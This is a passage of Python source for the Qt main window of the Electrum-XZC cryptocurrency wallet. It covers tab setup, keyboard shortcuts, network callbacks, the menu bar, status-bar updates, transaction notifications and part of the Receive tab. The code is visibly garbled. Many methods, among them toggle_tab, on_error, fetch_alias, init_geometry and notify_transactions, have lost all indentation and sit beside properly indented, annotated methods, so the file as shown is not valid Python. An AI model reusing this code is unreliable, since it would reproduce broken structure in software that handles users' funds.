        add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
        add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
        add_optional_tab(tabs, self.dip3_tab, read_QIcon("tab_dip3.png"), _("&DIP3"), "dip3")
        add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")

        tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        self.setCentralWidget(tabs)

        if self.config.get("is_maximized"):
            self.showMaximized()

        self.setWindowIcon(read_QIcon("electrum-xzc.png"))
        self.init_menubar()

        # keyboard shortcuts; wrtabs is a weak proxy so the lambdas below
        # do not keep the tab widget (and hence the window) alive
        wrtabs = weakref.proxy(tabs)
        QShortcut(QKeySequence("Ctrl+W"), self, self.close)
        QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
        QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
        QShortcut(QKeySequence("F5"), self, self.update_wallet)
        QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
        QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
        QShortcut(QKeySequence("Ctrl+M"), self, self.show_masternode_dialog)

        for i in range(wrtabs.count()):
            # i=i binds the loop variable per-shortcut (late-binding fix)
            QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))

        self.payment_request_ok_signal.connect(self.payment_request_ok)
        self.payment_request_error_signal.connect(self.payment_request_error)
        self.history_list.setFocus(True)

        # network callbacks
        if self.network:
            self.network_signal.connect(self.on_network_qt)
            self.gui_object.dash_net_sobj.main.connect(self.on_dash_net_qt)
            interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                         'new_transaction', 'status',
                         'banner', 'verified', 'fee', 'fee_histogram']
            # To avoid leaking references to "self" that prevent the
            # window from being GC-ed when closed, callbacks should be
            # methods of this class only, and specifically not be
            # partials, lambdas or methods of subobjects. Hence...
            self.network.register_callback(self.on_network, interests)
            # set initial message
            self.console.showMessage(self.network.banner)
            self.network.register_callback(self.on_quotes, ['on_quotes'])
            self.network.register_callback(self.on_history, ['on_history'])
            self.new_fx_quotes_signal.connect(self.on_fx_quotes)
            self.new_fx_history_signal.connect(self.on_fx_history)
            # dash net callbacks
            self.network.dash_net.register_callback(self.on_dash_net,
                                                    ['dash-net-updated',
                                                     'dash-peers-updated'])
            self.update_dash_net_status_btn()

        # update fee slider in case we missed the callback
        self.fee_slider.update()
        self.load_wallet(wallet)
        gui_object.timer.timeout.connect(self.timer_actions)
        self.fetch_alias()

        # If the option hasn't been set yet
        # NOTE(review): with a default of False, an *unset* key returns
        # False — this branch only fires if the key was explicitly stored
        # as None. Possibly config.get('check_updates') with no default was
        # intended; confirm against upstream.
        if config.get('check_updates', False) is None:
            choice = self.question(title="Electrum-XZC - " + _("Enable update check"),
                                   msg=_("For security reasons we advise that you always use the latest version of Electrum-XZC.") + " " +
                                       _("Would you like to be notified when there is a newer version of Electrum available?"))
            config.set_key('check_updates', bool(choice), save=True)

        if config.get('check_updates', False):
            # The references to both the thread and the window need to be stored somewhere
            # to prevent GC from getting in our way.
            def on_version_received(v):
                if UpdateCheck.is_newer(v):
                    self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
                    self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
                    self.update_check_button.show()
            self._update_check_thread = UpdateCheckThread(self)
            self._update_check_thread.checked.connect(on_version_received)
            self._update_check_thread.start()
    def on_history(self, b):
        """Network callback: new fiat exchange-rate history arrived (runs off the GUI thread)."""
        # Cached per-coin fiat prices are stale once new history is available.
        self.wallet.clear_coin_price_cache()
        # Re-emit as a Qt signal so the UI refresh happens in the GUI thread.
        self.new_fx_history_signal.emit()
    def setup_exception_hook(self):
        """Install the crash-reporter exception hook for this window."""
        Exception_Hook(self)
    def on_fx_history(self):
        """GUI-thread handler for new_fx_history_signal: refresh fiat columns."""
        self.history_model.refresh('fx_history')
        self.address_list.update()
    def on_quotes(self, b):
        """Network callback: new fiat quotes arrived; forward to the GUI thread via a signal."""
        self.new_fx_quotes_signal.emit()
    def on_fx_quotes(self):
        """GUI-thread handler for new_fx_quotes_signal: re-render amounts with the new rate."""
        self.update_status()
        # Refresh edits with the new rate
        edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
        edit.textEdited.emit(edit.text())
        edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
        edit.textEdited.emit(edit.text())
        # History tab needs updating if it used spot
        if self.fx.history_used_spot:
            self.history_model.refresh('fx_quotes')
            self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
    def push_top_level_window(self, window):
        '''Used for e.g. tx dialog box to ensure new dialogs are appropriately
        parented. This used to be done by explicitly providing the parent
        window, but that isn't something hardware wallet prompts know.'''
        # tl_windows is a stack; the most recently pushed window wins.
        self.tl_windows.append(window)
    def pop_top_level_window(self, window):
        """Remove *window* from the top-level-window stack (raises ValueError if absent)."""
        self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
    def diagnostic_name(self):
        """Label used by the logging framework; delegates to the wallet's name."""
        return self.wallet.diagnostic_name()
    def is_hidden(self):
        """Return True if the window is minimized or not shown at all."""
        return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
    def bring_to_top(self):
        """Un-hide the window and raise it above other windows."""
        self.show()
        self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
    def on_network(self, event, *args):
        """Network-thread callback dispatcher (registered in __init__).

        Runs OFF the GUI thread: anything that must touch widgets is
        forwarded through Qt signals; thread-safe flag/queue updates are
        done directly.
        """
        if event == 'wallet_updated':
            wallet = args[0]
            if wallet == self.wallet:
                self.need_update.set()
        elif event == 'network_updated':
            self.gui_object.network_updated_signal_obj.network_updated_signal \
                .emit(event, args)
            self.network_signal.emit('status', None)
        elif event == 'blockchain_updated':
            # to update number of confirmations in history
            self.need_update.set()
        elif event == 'new_transaction':
            wallet, tx = args
            if wallet == self.wallet:
                # Queued here; the GUI timer drains it in notify_transactions().
                self.tx_notification_queue.put(tx)
        elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
            # Handle in GUI thread
            self.network_signal.emit(event, args)
        else:
            self.logger.info(f"unexpected network message: {event} {args}")
    def on_dash_net(self, event, *args):
        """Dash-net thread callback: forward the event into the GUI thread via a signal."""
        self.gui_object.dash_net_sobj.main.emit(event, args)
    def on_dash_net_qt(self, event, args=None):
        """GUI-thread handler for dash-net events; only the status button needs refreshing."""
        self.update_dash_net_status_btn()
def update_dash_net_status_btn(self):
net = self.network
icon = (net.dash_net.status_icon() if net else 'dash_net_off.png')
self.dash_net_button.setIcon(read_QIcon(icon))
    def on_network_qt(self, event, args=None):
        """GUI-thread dispatcher for network events forwarded via network_signal.

        Counterpart of on_network(): runs in the Qt main thread, so it may
        touch widgets directly.
        """
        # Handle a network message in the GUI thread
        if event == 'status':
            self.update_status()
        elif event == 'banner':
            self.console.showMessage(args[0])
        elif event == 'verified':
            wallet, tx_hash, tx_mined_status = args
            if wallet == self.wallet:
                self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
        elif event == 'fee':
            if self.config.is_dynfee():
                self.fee_slider.update()
                self.require_fee_update = True
        elif event == 'fee_histogram':
            if self.config.is_dynfee():
                self.fee_slider.update()
                self.require_fee_update = True
            # The histogram model is refreshed regardless of dynfee mode.
            self.history_model.on_fee_histogram()
        else:
            self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
    def close_wallet(self):
        """Log wallet closure and give plugins a chance to clean up."""
        if self.wallet:
            self.logger.info(f'close_wallet {self.wallet.storage.path}')
        run_hook('close_wallet', self.wallet)
    @profiler
    def load_wallet(self, wallet):
        """Wire *wallet* into this window and populate all tabs and menus.

        Runs in the GUI thread during window construction; the statement
        order matters (e.g. tabs must exist before geometry is restored).
        """
        # Background task thread for wallet operations; errors surface via on_error.
        wallet.thread = TaskThread(self, self.on_error)
        self.masternode_manager = MasternodeManager(self.wallet, self.config)
        self.dip3_tab.w_model.reload_data()
        self.dip3_tab.update_wallet_label()
        self.update_recently_visited(wallet.storage.path)
        self.need_update.set()
        # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
        # update menus
        self.seed_menu.setEnabled(self.wallet.has_seed())
        self.update_lock_icon()
        self.update_buttons_on_seed()
        self.update_console()
        self.clear_receive_tab()
        self.request_list.update()
        self.tabs.show()
        self.init_geometry()
        # Start minimized to tray if configured and the tray icon is available.
        if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
            self.hide()
        else:
            self.show()
        self.watching_only_changed()
        run_hook('load_wallet', wallet, self)
        try:
            wallet.try_detecting_internal_addresses_corruption()
        except InternalAddressCorruption as e:
            self.show_error(str(e))
            send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-XZC Testnet" if constants.net.TESTNET else "Electrum-XZC"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
    def warn_if_watching_only(self):
        """Pop a warning dialog if the loaded wallet cannot spend (watch-only)."""
        if self.wallet.is_watching_only():
            msg = ' '.join([
                _("This wallet is watching-only."),
                _("This means you will not be able to spend Zcoins with it."),
                _("Make sure you own the seed phrase or the private keys, before you request Zcoins to be sent to this wallet.")
            ])
            self.show_warning(msg, title=_('Watch-only wallet'))
    def warn_if_testnet(self):
        """Warn once per process that testnet coins are worthless.

        Honors the persisted opt-out ('dont_show_testnet_warning') and offers
        a checkbox to set it.
        """
        if not constants.net.TESTNET:
            return
        # user might have opted out already
        if self.config.get('dont_show_testnet_warning', False):
            return
        # only show once per process lifecycle
        if getattr(self.gui_object, '_warned_testnet', False):
            return
        self.gui_object._warned_testnet = True
        msg = ''.join([
            _("You are in testnet mode."), ' ',
            _("Testnet coins are worthless."), '\n',
            _("Testnet is separate from the main Zcoin network. It is used for testing.")
        ])
        cb = QCheckBox(_("Don't show this again."))
        cb_checked = False
        def on_cb(x):
            # Track checkbox state via closure; read after the dialog closes.
            nonlocal cb_checked
            cb_checked = x == Qt.Checked
        cb.stateChanged.connect(on_cb)
        self.show_warning(msg, title=_('Testnet'), checkbox=cb)
        if cb_checked:
            self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
    def backup_wallet(self):
        """Prompt for a destination and copy the wallet file there."""
        path = self.wallet.storage.path
        wallet_folder = os.path.dirname(path)
        filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
        if not filename:
            return
        new_path = os.path.join(wallet_folder, filename)
        if new_path != path:
            try:
                # copy2 preserves file metadata (mtime, permissions).
                shutil.copy2(path, new_path)
                self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
            except BaseException as reason:
                # Deliberately broad: any failure is reported, never raised.
                self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
    def get_wallet_folder(self):
        """Return the absolute directory containing the current wallet file."""
        return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
    def init_menubar(self):
        """Build the whole menu bar (File/Wallet/View/Tools/Help).

        Also stores menu actions that other code toggles later
        (password_menu, seed_menu, import/export actions, ...).
        """
        menubar = QMenuBar()
        # --- File menu ---
        file_menu = menubar.addMenu(_("&File"))
        self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
        file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
        file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
        file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
        file_menu.addAction(_("Delete"), self.remove_wallet)
        file_menu.addSeparator()
        file_menu.addAction(_("&Quit"), self.close)
        # --- Wallet menu ---
        wallet_menu = menubar.addMenu(_("&Wallet"))
        wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
        wallet_menu.addSeparator()
        # Kept as attributes: enabled/visible state is updated in watching_only_changed().
        self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
        self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
        self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
        self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
        self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
        self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
        self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
        wallet_menu.addSeparator()
        addresses_menu = wallet_menu.addMenu(_("&Addresses"))
        addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
        labels_menu = wallet_menu.addMenu(_("&Labels"))
        labels_menu.addAction(_("&Import"), self.do_import_labels)
        labels_menu.addAction(_("&Export"), self.do_export_labels)
        history_menu = wallet_menu.addMenu(_("&History"))
        history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
        history_menu.addAction(_("&Summary"), self.history_list.show_summary)
        history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
        history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
        contacts_menu = wallet_menu.addMenu(_("Contacts"))
        contacts_menu.addAction(_("&New"), self.new_contact_dialog)
        contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
        contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
        invoices_menu = wallet_menu.addMenu(_("Invoices"))
        invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
        invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
        wallet_menu.addSeparator()
        wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
        # --- View menu (optional tab toggles) ---
        def add_toggle_action(view_menu, tab):
            is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
            item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
            tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
        view_menu = menubar.addMenu(_("&View"))
        add_toggle_action(view_menu, self.addresses_tab)
        add_toggle_action(view_menu, self.utxo_tab)
        add_toggle_action(view_menu, self.contacts_tab)
        # add_toggle_action(view_menu, self.dip3_tab)
        add_toggle_action(view_menu, self.console_tab)
        wallet_menu.addSeparator()
        wallet_menu.addAction(_("Znodes"), self.show_masternode_dialog)
        # --- Tools menu ---
        tools_menu = menubar.addMenu(_("&Tools"))
        # Settings / Preferences are all reserved keywords in macOS using this as work around
        tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
        tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
        tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
        tools_menu.addSeparator()
        tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
        tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
        tools_menu.addSeparator()
        paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
        raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
        raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
        raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
        raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
        raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
        self.raw_transaction_menu = raw_transaction_menu
        # Let plugins append their own tool entries.
        run_hook('init_menubar_tools', self, tools_menu)
        # --- Help menu ---
        help_menu = menubar.addMenu(_("&Help"))
        help_menu.addAction(_("&About"), self.show_about)
        help_menu.addAction(_("&Check for updates"), self.show_update_check)
        help_menu.addAction(_("&Official website"), lambda: webopen("https://zcoin.io"))
        help_menu.addSeparator()
        help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
        help_menu.addAction(_("&Report Bug"), self.show_report_bug)
        help_menu.addSeparator()
        help_menu.addAction(_("&Donate to server"), self.donate_to_server)
        self.setMenuBar(menubar)
    def donate_to_server(self):
        """Open the Send tab pre-filled with the current server's donation address."""
        d = self.network.get_donation_address()
        if d:
            host = self.network.get_parameters().host
            # NOTE(review): the 'bitcoin:' URI scheme looks like a leftover
            # from upstream Electrum in this Zcoin fork -- confirm what
            # scheme pay_to_URI() actually accepts before changing it.
            self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
        else:
            self.show_error(_('No donation address for this server'))
    def show_about(self):
        """Show the About dialog with version and project blurb."""
        QMessageBox.about(self, "Electrum-XZC",
                          (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
                           _("Electrum's focus is speed, with low resource usage and simplifying Zcoin.") + " " +
                           _("You do not need to perform regular backups, because your wallet can be "
                              "recovered from a secret phrase that you can memorize or write on paper.") + " " +
                           _("Startup times are instant because it operates in conjunction with high-performance "
                              "servers that handle the most complicated parts of the Zcoin system.") + "\n\n" +
                           _("Uses icons from the Icons8 icon pack (icons8.com).")))
    def show_update_check(self, version=None):
        """Open the update-check dialog; a reference is kept on gui_object to survive GC."""
        self.gui_object._update_check = UpdateCheck(self, version)
    def show_report_bug(self):
        """Show a rich-text dialog pointing users at the GitHub issue tracker."""
        msg = ' '.join([
            _("Please report any bugs as issues on github:<br/>"),
            f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
            _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
            _("Try to explain not only what the bug is, but how it occurs.")
        ])
        self.show_message(msg, title="Electrum-XZC - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
    def notify(self, message):
        """Show *message* as a system-tray balloon notification (20 s timeout)."""
        if self.tray:
            try:
                # this requires Qt 5.9
                self.tray.showMessage("Electrum-XZC", message, read_QIcon("electrum_dark_icon"), 20000)
            except TypeError:
                # Older Qt: fall back to the stock information icon.
                self.tray.showMessage("Electrum-XZC", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
    def timer_actions(self):
        """Periodic housekeeping driven by gui_object.timer (GUI thread).

        Flushes the need_update flag into a full wallet refresh, updates the
        sync progress, resolves aliases, recomputes fees, and drains pending
        transaction notifications.
        """
        # Note this runs in the GUI thread
        if self.need_update.is_set():
            self.need_update.clear()
            self.update_wallet()
        elif not self.wallet.up_to_date:
            # this updates "synchronizing" progress
            self.update_status()
        # resolve aliases
        # FIXME this is a blocking network call that has a timeout of 5 sec
        self.payto_e.resolve()
        # update fee
        if self.require_fee_update:
            self.do_update_fee()
            self.require_fee_update = False
        self.notify_transactions()
    def format_amount(self, x, is_diff=False, whitespaces=False):
        """Format satoshi amount *x* using the window's zero-padding and decimal point."""
        return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
    def format_fee_rate(self, fee_rate):
        """Format *fee_rate* (sat/kB) as a human-readable sat/byte string."""
        # fee_rate is in sat/kB
        return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
    def get_decimal_point(self):
        """Return the current decimal-point setting (unit granularity)."""
        return self.decimal_point
    def base_unit(self):
        """Return the display name of the base unit for the current decimal point."""
        return decimal_point_to_base_unit_name(self.decimal_point)
    def connect_fields(self, window, btc_e, fiat_e, fee_e):
        """Keep a coin-amount edit and a fiat edit in sync both ways.

        The `follows` flag breaks the feedback loop: while one edit is being
        programmatically updated from the other, its change events are
        ignored.  `is_last_edited` records which edit the user touched last
        (used by on_fx_quotes to decide which side to re-derive).
        """
        def edit_changed(edit):
            if edit.follows:
                # Programmatic update in progress; don't echo it back.
                return
            edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
            fiat_e.is_last_edited = (edit == fiat_e)
            amount = edit.get_amount()
            rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
            if rate.is_nan() or amount is None:
                # No rate or no amount: blank the derived side(s).
                if edit is fiat_e:
                    btc_e.setText("")
                    if fee_e:
                        fee_e.setText("")
                else:
                    fiat_e.setText("")
            else:
                if edit is fiat_e:
                    btc_e.follows = True
                    btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                    btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    btc_e.follows = False
                    if fee_e:
                        window.update_fee()
                else:
                    fiat_e.follows = True
                    fiat_e.setText(self.fx.ccy_amount_str(
                        amount * Decimal(rate) / COIN, False))
                    fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    fiat_e.follows = False
        btc_e.follows = False
        fiat_e.follows = False
        fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
        btc_e.textChanged.connect(partial(edit_changed, btc_e))
        fiat_e.is_last_edited = False
    def update_status(self):
        """Refresh the status bar: balance text, tray tooltip and status icon.

        Chooses between offline / synchronizing / lagging / balance display
        depending on network and wallet state.
        """
        if not self.wallet:
            return
        if self.network is None:
            text = _("Offline")
            icon = read_QIcon("status_disconnected.png")
        elif self.network.is_connected():
            self.masternode_manager.send_subscriptions()
            server_height = self.network.get_server_height()
            server_lag = self.network.get_local_height() - server_height
            fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
            # Server height can be 0 after switching to a new server
            # until we get a headers subscription request response.
            # Display the synchronizing message in that case.
            if not self.wallet.up_to_date or server_height == 0:
                num_sent, num_answered = self.wallet.get_history_sync_state_details()
                text = ("{} ({}/{})"
                        .format(_("Synchronizing..."), num_answered, num_sent))
                icon = read_QIcon("status_waiting.png")
            elif server_lag > 1:
                text = _("Server is lagging ({} blocks)").format(server_lag)
                icon = read_QIcon("status_lagging%s.png"%fork_str)
            else:
                # c/u/x = confirmed, unconfirmed, unmatured balances.
                c, u, x = self.wallet.get_balance()
                text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
                if u:
                    text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
                if x:
                    text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
                # append fiat balance and price
                if self.fx.is_enabled():
                    text += self.fx.get_fiat_status_text(c + u + x,
                        self.base_unit(), self.get_decimal_point()) or ''
                if not self.network.proxy:
                    icon = read_QIcon("status_connected%s.png"%fork_str)
                else:
                    icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
        else:
            if self.network.proxy:
                text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
            else:
                text = _("Not connected")
            icon = read_QIcon("status_disconnected.png")
        self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
        self.balance_label.setText(text)
        self.status_button.setIcon( icon )
    def update_wallet(self):
        """Refresh the status bar, and all tabs once the wallet is settled
        (up to date, or there is no usable network connection)."""
        self.update_status()
        if self.wallet.up_to_date or not self.network or not self.network.is_connected():
            self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
    def create_history_tab(self):
        """Build the History tab: model + list view + optional filter toolbar."""
        self.history_model = HistoryModel(self)
        self.history_list = l = HistoryList(self, self.history_model)
        self.history_model.set_view(self.history_list)
        # The list is its own searchable widget for the Find feature.
        l.searchable_list = l
        l.setObjectName("history_container")
        toolbar = l.create_toolbar(self.config)
        toolbar_shown = self.config.get('show_toolbar_history', False)
        l.show_toolbar(toolbar_shown)
        return self.create_list_tab(l, toolbar)
    def show_address(self, addr):
        """Open the modal address-details dialog for *addr*."""
        from . import address_dialog
        d = address_dialog.AddressDialog(self, addr)
        d.exec_()
    def show_transaction(self, tx, tx_desc = None):
        '''tx_desc is set only for txs created in the Send tab'''
        show_transaction(tx, self, tx_desc)
    def create_receive_tab(self):
        """Build the Receive tab: address/description/amount inputs, expiry
        selector, QR preview and the list of saved payment requests."""
        # A 4-column grid layout. All the stretch is in the last column.
        # The exchange rate plugin adds a fiat widget in column 2
        self.receive_grid = grid = QGridLayout()
        grid.setSpacing(8)
        grid.setColumnStretch(3, 1)
        self.receive_address_e = ButtonsLineEdit()
        self.receive_address_e.addCopyButton(self.app)
        self.receive_address_e.setReadOnly(True)
        msg = _('Zcoin address where the payment should be received. Note that each payment request uses a different Zcoin address.')
        self.receive_address_label = HelpLabel(_('Receiving address'), msg)
        self.receive_address_e.textChanged.connect(self.update_receive_qr)
        self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
        self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
        grid.addWidget(self.receive_address_label, 0, 0)
        grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
        self.receive_message_e = QLineEdit()
        grid.addWidget(QLabel(_('Description')), 1, 0)
        grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
        self.receive_message_e.textChanged.connect(self.update_receive_qr)
        self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
        grid.addWidget(QLabel(_('Requested amount')), 2, 0)
